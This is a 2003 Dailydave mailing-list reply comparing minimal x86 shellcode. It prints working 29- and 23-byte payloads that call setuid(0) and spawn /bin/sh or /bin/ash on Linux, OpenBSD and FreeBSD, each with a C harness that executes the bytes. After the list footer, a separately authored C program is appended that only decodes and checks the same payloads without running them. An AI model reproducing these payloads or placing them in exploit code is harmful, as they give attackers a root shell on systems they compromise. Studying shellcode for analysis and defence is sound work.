Dailydave mailing list archives
Re: Shellcode Size
From: Max Vision <vision () whitehats com>
Date: Mon, 24 Nov 2003 13:48:48 -0800 (PST)
On Sun, 23 Nov 2003, David Maynor wrote:
> What is the smallest shellcode anybody has written to spawn a simple shell with uid 0. I am down to 31 bytes and I was wondering if anybody has smaller.
I would swear someone sent me obscenely small "private" shellcode one of
the many previous times this question has come up (years ago), but I can't
find it. Anyhow, how about these 29 bytes, untested:
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
"\x2f\x61\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\xcd\x80";
That's assuming you're talking Linux x86. I just took zasta's 21-byte
shellcode and prepended setuid(0). I think it takes 10 bytes to do
setreuid(0,0); correct me if I'm wrong.
("\x31\xc0\x89\xc3\x89\xc1\xb0\x47\xcd\x80" /* setregid(0, 0) */)
Here is zasta's code; argv is null, so it uses ash...
/* 21 byte execve("/bin/ash",0,0); shellcode for linux x86
 * by zasta (zasta () darkircop org)
 * Needs a 32-bit build (gcc -m32) with an executable data segment,
 * and /bin/ash present on the target. */
#include <unistd.h>
#include <stdio.h>
char shellcode[] = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
"\x2f\x61\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\xcd\x80";
/* Assembly source of the bytes above, kept for reference (not called). */
void code() {
__asm__(
    "xor %ecx,%ecx\n\t"     /* ecx = 0: argv = NULL */
    "mul %ecx\n\t"          /* eax = edx = 0: envp = NULL */
    "addb $0xb,%al\n\t"     /* eax = 11 = __NR_execve */
    "push %edx\n\t"         /* NUL terminator for the path */
    "push $0x6873612f\n\t"  /* "/ash" */
    "push $0x6e69622f\n\t"  /* "/bin" -> "/bin/ash" at %esp */
    "mov %esp,%ebx\n\t"     /* ebx = pathname */
    "int $0x80"
);
}
int main() {
void (*ptr)() = (void(*)()) &shellcode[0];
(*ptr)();
return 0;
}
The next smallest shellcodes I have seen are 23 bytes each
(Linux/FreeBSD/OpenBSD):
/************************************************************
 * Linux 23 byte execve code. Greetz to preedator
 * marcetam
 * admin () marcetam net
 ************************************************************/
#include <stdio.h>
#include <string.h>
/* Renamed from `linux`: GNU C predefines `linux` as a macro, so that name
 * does not compile. Needs a 32-bit build with an executable data segment. */
char linux_execve[]=
"\x99" /* cdq - edx = 0 as long as eax is non-negative on entry */
"\x52" /* push %edx - NUL terminator */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f - "//sh" */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f - "/bin" */
"\x89\xe3" /* mov %esp,%ebx - pathname "/bin//sh" */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x54" /* push %esp */
"\x59" /* pop %ecx - argv */
"\x6a\x0b" /* push $0x0b */
"\x58" /* pop %eax - __NR_execve */
"\xcd\x80"; /* int $0x80 */
int main(){
void (*run)()=(void *)linux_execve;
printf("%d bytes \n",(int)strlen(linux_execve));
run();
}
/************************************************************
 * OpenBSD 23 byte execve code. Greetz to preedator
 * marcetam
 * admin () marcetam net
 ************************************************************/
#include <stdio.h>
#include <string.h>
/* BSD passes syscall arguments on the stack above a return-address slot,
 * so the extra push %ebx fills that slot. */
char open_bsd[]=
"\x99" /* cdq - edx = 0 as long as eax is non-negative on entry */
"\x52" /* push %edx - NUL terminator */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e - "n/sh" */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f - "//bi" */
"\x89\xe3" /* mov %esp,%ebx - pathname "//bin/sh" */
"\x52" /* push %edx - envp = NULL */
"\x54" /* push %esp - argv (points at the NULL just pushed) */
"\x53" /* push %ebx - path */
"\x53" /* push %ebx - fills the return-address slot */
"\x6a\x3b" /* push $0x3b */
"\x58" /* pop %eax - SYS_execve */
"\xcd\x80"; /* int $0x80 */
int main(){
void (*run)()=(void *)open_bsd;
printf("%d bytes\n",(int)strlen(open_bsd));
run();
}
/* FreeBSD 23 byte execve code. Greetz to anathema, the first who published
 * this way of writing shellcodes.
 * greetz to preedator marcetam
 * admin () marcetam net
 ****************************************************************************/
#include <stdio.h>
#include <string.h>
char fbsd_execve[]=
"\x99" /* cdq - edx = 0 as long as eax is non-negative on entry */
"\x52" /* push %edx - NUL terminator */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e - "n/sh" */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f - "//bi" */
"\x89\xe3" /* movl %esp,%ebx - pathname "//bin/sh" */
"\x51" /* push %ecx - or %edx :) - envp */
"\x52" /* push %edx - or %ecx :) - argv = NULL */
"\x53" /* push %ebx - path */
"\x53" /* push %ebx - fills the return-address slot */
"\x6a\x3b" /* push $0x3b */
"\x58" /* pop %eax - SYS_execve */
"\xcd\x80"; /* int $0x80 */
int main() {
void (*run)()=(void *)fbsd_execve;
printf("%d bytes \n",(int)strlen(fbsd_execve));
run();
}
Max
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
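An added example (mine, not part of Max Vision's post or of zasta's or marcetam's code): a C checker that decodes the payloads quoted above without executing them, so it builds and runs on any host, 64-bit included. It copies the byte strings from the post, confirms the 29- and 23-byte lengths, checks for NUL bytes that would truncate a payload delivered through a strcpy()-style copy, counts the int 0x80 system calls (two in the setuid(0)-prefixed version), and reconstructs the path each payload assembles with its push imm32 pairs. The instruction-length decoder covers only the handful of opcodes these payloads use; that limitation is an assumption of the example, not a general disassembler.

```c
/* Added example, not part of the original post or of the quoted authors'
 * code: static checks for the x86 execve payloads above. Nothing here
 * executes the shellcode. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Byte strings copied from the post. */
static const unsigned char sc_linux_ash[] =      /* setuid(0) + zasta's execve("/bin/ash") */
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
    "\x2f\x61\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
static const unsigned char sc_linux_sh[] =       /* marcetam, Linux: "/bin//sh" */
    "\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x52\x54\x54\x59\x6a\x0b\x58\xcd\x80";
static const unsigned char sc_openbsd[] =        /* marcetam, OpenBSD: "//bin/sh" */
    "\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
    "\x89\xe3\x52\x54\x53\x53\x6a\x3b\x58\xcd\x80";
#define SC_LINUX_ASH_LEN (sizeof sc_linux_ash - 1)
#define SC_LINUX_SH_LEN  (sizeof sc_linux_sh - 1)
#define SC_OPENBSD_LEN   (sizeof sc_openbsd - 1)

/* 1 if the payload contains a NUL byte, which would truncate it when it is
 * delivered through a strcpy()/sprintf()-style copy. */
int has_nul(const unsigned char *sc, size_t n) {
    for (size_t i = 0; i < n; i++) if (sc[i] == 0) return 1;
    return 0;
}

/* Length of one instruction from the small 32-bit x86 subset these payloads
 * use (my own minimal decoder, an assumption of this example). ModRM is only
 * accepted in register-direct form (mod == 11b); anything else returns -1. */
int x86_insn_len(const unsigned char *p, size_t left) {
    if (left == 0) return -1;
    unsigned char op = p[0];
    if (op == 0x99) return 1;                        /* cdq */
    if (op >= 0x50 && op <= 0x5f) return 1;          /* push/pop r32 */
    if (op == 0x04 || op == 0x6a || op == 0xcd ||    /* add al,imm8; push imm8; int imm8 */
        (op >= 0xb0 && op <= 0xb7))                  /* mov r8,imm8 */
        return left >= 2 ? 2 : -1;
    if (op == 0x68) return left >= 5 ? 5 : -1;       /* push imm32 */
    if (op == 0x31 || op == 0x89 || op == 0xf7)      /* xor, mov, mul group: ModRM follows */
        return (left >= 2 && (p[1] & 0xc0) == 0xc0) ? 2 : -1;
    return -1;
}

/* Reconstructs the path the payload builds on the stack: each `push imm32` is
 * recorded in program order and emitted in reverse, since the last dword pushed
 * lands at the lowest address, i.e. the start of the string. Walking instruction
 * by instruction matters because 0x68 ('h' in "sh") also occurs inside the
 * immediates. Returns the string length, or -1 on undecodable input/overflow. */
int recover_path(const unsigned char *sc, size_t n, char *out, size_t outsz) {
    uint32_t imm[8];
    int count = 0;
    for (size_t off = 0; off < n; ) {
        int len = x86_insn_len(sc + off, n - off);
        if (len < 0) return -1;
        if (sc[off] == 0x68) {
            if (count == 8) return -1;
            imm[count++] = (uint32_t)sc[off + 1] | (uint32_t)sc[off + 2] << 8 |
                           (uint32_t)sc[off + 3] << 16 | (uint32_t)sc[off + 4] << 24;
        }
        off += (size_t)len;
    }
    if ((size_t)count * 4 + 1 > outsz) return -1;
    size_t pos = 0;
    for (int i = count - 1; i >= 0; i--)
        for (int b = 0; b < 4; b++) out[pos++] = (char)(unsigned char)(imm[i] >> (8 * b));
    out[pos] = '\0';
    return (int)pos;
}

/* Same as recover_path(), returned in a static buffer; NULL if undecodable. */
const char *path_of(const unsigned char *sc, size_t n) {
    static char buf[64];
    return recover_path(sc, n, buf, sizeof buf) < 0 ? NULL : buf;
}

/* Number of `int 0x80` system calls in the payload, or -1 if it does not decode. */
int count_syscalls(const unsigned char *sc, size_t n) {
    int count = 0;
    for (size_t off = 0; off < n; ) {
        int len = x86_insn_len(sc + off, n - off);
        if (len < 0) return -1;
        if (sc[off] == 0xcd && sc[off + 1] == 0x80) count++;
        off += (size_t)len;
    }
    return count;
}

static void report(const char *name, const unsigned char *sc, size_t n) {
    const char *path = path_of(sc, n);
    printf("%-18s %2u bytes  NUL-free: %s  syscalls: %d  path: %s\n", name, (unsigned)n,
           has_nul(sc, n) ? "no" : "yes", count_syscalls(sc, n), path ? path : "(undecodable)");
}

int main(void) {
    report("setuid(0)+execve", sc_linux_ash, SC_LINUX_ASH_LEN);
    report("linux execve", sc_linux_sh, SC_LINUX_SH_LEN);
    report("openbsd execve", sc_openbsd, SC_OPENBSD_LEN);
    return 0;
}
```

Build it with any C compiler; no -m32 is needed because nothing is executed. Two properties the decoder makes visible: the 23-byte variants start with cdq, so edx (and hence the NULL argument) is only 0 if eax is non-negative when the shellcode gets control, and the "//sh" and "//bi" doubling pads "/bin/sh" from 7 to 8 bytes so the path fits two push imm32 without a NUL in either immediate, which is what keeps has_nul() false.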
Current thread:
- Shellcode Size David Maynor (Nov 24)
- Re: Shellcode Size Max Vision (Nov 24)
